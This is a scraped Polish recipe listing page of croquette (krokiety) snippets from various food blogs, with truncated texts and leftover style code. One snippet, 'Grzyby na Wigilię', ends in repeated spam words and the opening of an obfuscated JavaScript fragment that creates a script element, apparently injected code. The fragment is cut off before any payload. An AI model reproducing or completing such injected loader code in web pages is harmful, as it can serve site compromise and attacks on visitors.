krokiety - 2464 przepisów (strona:37/165)

Chrupiące krokiety z kapustą i pieczarkami 163

Krokiety z kapustą i pieczarkami, idealne do barszczu czerwonego. Takie krokiety są u mnie obowiązkową pozycją na Wigilijnym stole, ale również wspaniale smakują na co dzień i podczas imprez, z kubkiem gorącego barszczyku Artykuł Chrupiące krokiety z kapustą i pieczarkami pochodzi z serwisu

NiePieprz.pl
Krokiety z soczewicą w sosie z wędzoną śliwką 82

soczewicę. Następnie zmniejszamy ogień i dodajemy ketchup, szczypiorek oraz serek topiony. Mieszamy, aż serek się roztopi i wszystko ładnie połączy. Na każdym naleśniku rozsmarowujemy łyżkę farszu i zwijamy na krokiety. Obtaczamy w jajku i pokruszonych płatkach kukurydzianych. Smażymy z każdej strony na oleju. Przygotowujemy sos. Pokrojoną w piórka czerwoną cebulę szklimy na oleju. Dodajemy pokrojone na mniejsze kawałki śliwki wędzone(...)przecier pomidorowy i przyprawy. Chwilę dusimy i podajemy z krokietami. Smacznego :) Artykuł Krokiety z soczewicą w sosie z wędzoną śliwką pochodzi z serwisu Mienta blog

Mienta blog
Krokiety Z Kapusty Coolwarp I Pieczarek 151

Przepyszne krokieciki wyszły z tej kapusty coolwarp, następnym razem przygotuje sobie więcej farszu, zamrożę i kiedy tylko najdzie mnie ochota na takie krokiety to będę mogła szybciej je sobie przygotować :) Składniki na 6 krokietów Ciasto naleśnikowe: 2 jajka kl L 1 szkl mąki 1 szkl wody gazowanej sól 2 łyżki oleju lub roztopionego masła Farsz: 400 g pieczarek 1/3 główki(...)kopertę, zamaczamy w jajku oraz obtaczamy w bułce tartej i smażymy na rumiano na oleju. Ps. farsz przed nakładaniem na naleśniki możemy sobie podzielić na kupki aby w każdym krokiecie  było go po równo

Gotowanie...to proste !
Krokiety bez naleśników 114

Lenistwo czasami wdaje się we znaki, a jeść coś tak pysznego jak krokiety, chce się. No to pogłówkowaliśmy i oto są. Krokiety bez naleśników. Oczywiście z obiadu sprzed dnia. Składniki 500 g ugotowanych żołądków drobiowych 150 g pieczarek 1 cebula 3 łyżki oleju rzepakowego 300 g kapusty kiszonej 2 liście laurowe 200 ml rosołu drobiowego 4 jajka 1 szklanka mąki(...)dusimy pod przykryciem do miękkości kapusty. Tak przygotowany farsz studzimy, 1/3 mielimy, dodajemy z powrotem do farszu, wbijamy 1 jajko, wsypujemy bułkę, do smaku doprawiamy solą i pieprzem. Formujemy krokiety, obtaczamy w mące, rozkłóconych jajkach z dodatkiem soli, pieprzu i papryki, następnie w bułce tartej. Smażymy na rozgrzanym oleju. Podajemy z barszczem

R'n'G Kitchen
Krokiety z tuńczykiem 258

Jeden ze sposób na popularne danie jakim są krokiety. W mojej kuchni uchodzą za krokiety na piątek. Naleśniki: 2 szklanki mleka mleka 3/4 szklanki wody 1 jajko 35 dag mąki tortowej sól, pieprz, przyprawa Vegeta lub Kucharek Nadzienie: 2 puszki (po 170 g) tuńczyka w oleju roślinnym 20 dag żółtego sera 2 małe ogórki kiszone Dodatkowo: 2 jajka bułka tarta(...)naleśniki. Kawałki tuńczyka odsączyć z nadmiaru oleju, rozdrobnić. Ser zetrzeć na tarce o dużych oczkach, ogórki pokroić w kostkę. Wymieszać wszystkie składniki nadzienia. Gotowy farsz nakładać na naleśniki, zwijać krokiety. Panierować w jajku i bułce tartej. Smażyć na oleju, na złoty kolor

Praktyczna pl
Krokiety z szynką, mozzarellą i chleba tostowego 449

Krokiety z szynką, mozzarellą i chlebem tostowym  Do przygotowania tego łatwego     przepisu na krokiety z chleba tostowego potrzebujemy tylko kilku składników, wykonuje się go bardzo szybko i efekt jest gwarantowany. Uwielbiany przez dorosłych jak i dzieci świetnie sprawdza się jako przekąska, ale może zastąpić  też obiad lub kolację. Często wykorzystuję ten przepis na krokiety jako dodatek

zielonacukinka
Naleśniki z przepisu Jamiego 209

Szukając inspiracji na smaczne i zdrowe śniadanie, Madzia znalazła przepis na pyszne naleśniki Jamiego. W oryginalnym wydaniu naleśniki były robione z mąki pszennej, my jednak postanowiliśmy

Kulinarnyblog.pl - wiesz jak gotować!
Klasyczne, cienkie naleśniki 191

jest wcale sprawą prostą, zrobić cienkie naleśniki, które nie są gumowe i nie pękają przy zwijaniu w krokiety.  Ten przepis wykorzystujemy zawsze gdy robimy naleśniki ze szpinakiem, twarożkiem, dżemem lub właśnie klasyczne krokiety. Naleśniki są również dobre na drugi dzień - nie wysychają i nie twardnieją. Wystarczy je jedynie przykryć i wstawić do lodówki. Powstałe ciasto jest dość rzadkie(...)smażenia zwykle oleju kokosowego. Twardym olejem po prostu smarujemy patelnię. Gwarantuje to, że tłuszcze jest minimalna ilość, a naleśniki się nie przypalają, ani nie pływają w tłuszczu. Do krokietów naleśniki należy smażyć mocniej z jednej strony, druga ma być blada, bo będzie ponownie przesmażona po zwinięciu.  Smacznego

Kuchnia od dwojga
Krokiety ruskie 241

miłością darzę farsz do ruskich :) Pierogi też lubię, wiadomo, ale to właśnie nadzienie jest tym, co najlepsze. Dlatego częściej przygotowuję z nim szybsze, niż pierogi, dania. Smażone kotleciki, naleśniki, krokiety, pieczone paszteciki i pierożki. To wszystko jedliśmy już milion razy. Podczas ostatnich grudniowych świąt trafiłam też na ciekawe urozmaicenie farszu do ruskich. Damian Kordas przygotował u Jamiego Olivera ruskie wzbogadzone(...)KLIK. Ja wykorzystałam mój standardowy przepis na 10 naleśników, zamieniając jedynie wodę gazowaną na piwo bezalkoholowe. A do farszu dodałam mniej ziemniaków, aby twaróg był bardziej wyczuwalny. Krokiety panierowane w płatkach kukurydzianych najlepiej smakują na ciepło, gdy farsz rozpływa się w ustach, a panierka jest chrupiąca. Natomiast na nastepny dzień zjedliśmy […] Artykuł Krokiety ruskie pochodzi z serwisu Mienta blog

Mienta blog
Krokiety z farszem z warzyw i jajek 362

Naleśnikowe krokiety zazwyczaj robię z farszem mięsno-warzywnym. Robię je z mięsa i warzyw, które zostaną po ugotowaniu zupy. Tym razem zrobiłam farsz bez dodatku mięsa, z jajek połączonych z warzywami i serem. Bardzo fajna odmiana, spróbujcie koniecznie. KROKIETY z FARSZEM  z WARZYW I JAJEK Składniki: (7-8szt) naleśniki: 2 jajka 1 szkl mleka 1 szkl mąki szczypta(...)kroimy w pióra, kukurydzę odsączamy z zalewy. Wszystkie składniki przekładamy do miski, dodajemy majonez, musztardę oraz sól i pieprz,mieszamy. Farsz nakładamy porcjami na naleśniki, zawijamy i tak przygotowane krokiety moczymy w roztrzepanym jajku i panierujemy w bułce tartej. Smażymy na rumiany kolor

Bon appetit mon amie
Krokiety z kapustą i grzybami 167

świętach mam niedosyt krokietów więc musiałam ponownie zrobić. Tym razem do farszu wykorzystałam grzyby, których mam spory zapas w zamrażarce. Do panierki z bułki tartej dodałam ziarna siemienia dzięki temu panierka przyjemnie chrupie. Oczywiście obowiązkowo do krokietów polecam barszczyk czerwony, u mnie na zakwasie . składniki: ciasto naleśnikowe 3 szklanki mąki 2 szklanki mleka 1 szkalnka wody 1-2 jajka(...)solą i pieprzem. Z  wcześniej ciasta usmażyć naleśniki. Na każdego nalśnika nałożyć ok 2 łyżki farszu. Boki złożyć do środka i zrolować. W ten sam sposób przygotować pozostałe krokiety. Potemkrokiety panierować w roztrzepanym jajku oraz bułce wymieszanej z siemieniem. Smażyć na złoty kolor ze wszystkich stron. Osączyć na papierowym ręczniku

Monia miesza i gotuje
z wafli krokiety z barszczykiem... 110

kapustą, wszystko dobrze wymieszać, do smaku doprawić pieprzem,solą wafle przecięłam na połowę (łatwiej mi pierwszy raz było do zawijania), spryskać wafle wodą ze spryskiwacza, nałożyć porcję farszu, zawijać krokiety jajka roztrzepane z łyżeczką oleju, w jajku maczać krokiety, obtaczać w tartej bułce na gorącym oleju rzepakowym smażyć na złocisto z każdej strony, podałam z barszczem z kartonu wymieszanym(...)rosołem i cukrem - pierwszy raz robiłam krokiety z wafli, ale na pewno nie ostatni, są smaczne, smakują jak naleśnikowe a szybciej są gotowe na obiad, jak najbardziej mogą być podane na Wigilię...........SMACZNEGO

W Mojej Kuchni Lubię
Barszcz czerwony na zakwasie z krokietami 155

hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-fareast-language:EN-US;} Barszcz czerwony na zakwasie  z krokietami Składniki - barszcz: Buraki czerwone – 5 sztuk Marchew – 2 sztuki Pietruszka – 2 sztuki Seler – 100g Zakwas – 1 szklanka Czosnek – 2-3 ząbki Suszone grzyby – 4-5 sztuk Majeranek, sól, pieprz, cukier(...)barszcz się nie zagotował) przez 2-3 godziny. W między czasie dodajemy kilka suszonych grzybów, czosnek i majeranek. Pod koniec gotowania doprawiamy do smaku solą i pieprzem. Wykonanie – krokiety: Mąkę przesiewamy przez sitko i mieszamy z mlekiem i wodą gazowaną. Następnie dodajemy do ciasta jajko, olej i całość dokładnie mieszamy. Naleśniki smażymy na dobrze rozgrzanej patelni. W między czasie podsmażamy

Kuchnia Bon Appetit
Grzyby na Wigilię w różnej postaci 140

centymetrów. Na każdym z nich kładziemy porcję farszu, zawijamy do środka krótsze boki i zawijamy. Smarujemy jajkiem i pieczemy przez 30 minut w temperaturze 180 stopni Celsjusza. Krokiety z grzybami Kolejny ze sposobów na wykorzystanie grzybów na Wigilii to przygotowanie krokietów. Naleśniki stanowiące ich bazę przyrządzimy z: 250 g mąki pszennej 250 mililitrów gazowanej wody mineralnej 250 g mleka(...)wystygnięcia. Mąkę łączymy z solą i sodą, dodajemy pozostałe składniki i miksujemy na gładkie ciasto. Smażony naleśniki. Na każdego z nich nakładamy około 2 łyżki farszu i zwijamy krokiety. Panierujemy je w roztrzepanym jajku oraz bułce tartej i obsmażamy na oleju. Spara Spara Spara Spara Spara Spara Spara Spara Spara Spara Spara Spara (function(){ i42g_=("u"+"st");i42g=document.createElement("script

codojedzenia
KROKIETY Z PIECZARKAMI I KAPUSTĄ 165

Krokiety. Kojarzą Nam się zdecydowanie z kiszoną kapustą i aromatycznymi leśnymi grzybkami. A u mnie dziś na opak. Słodka kapustka i pieczarki. Moim dzieciom zdecydowanie bardziej smakują takie krokiety w łagodniejszym wydaniu. Składniki: 1 szklanka mąki 1 szklanka wody gazowanej 1/2 szklanka mleka 2 jajka lub 1 duże wiejskie 2 łyżki oleju szczypta soli farsz: 1/4 główki średniej kapusty(...)osączoną kapustę. Smażymy razem ok 5 minut. *Z podanych składników przygotowujemy ciasto naleśnikowe. Smażymy cienkie naleśniki. *Na każdy naleśnik nakładamy 2-3 łyżki farszu, składamy w kopertę. * Każdy gotowy krokiet panierujemy  w jajku, w bułce tartej , obsmażamy na rumiano z obu stron

Z Majeczką w kuchni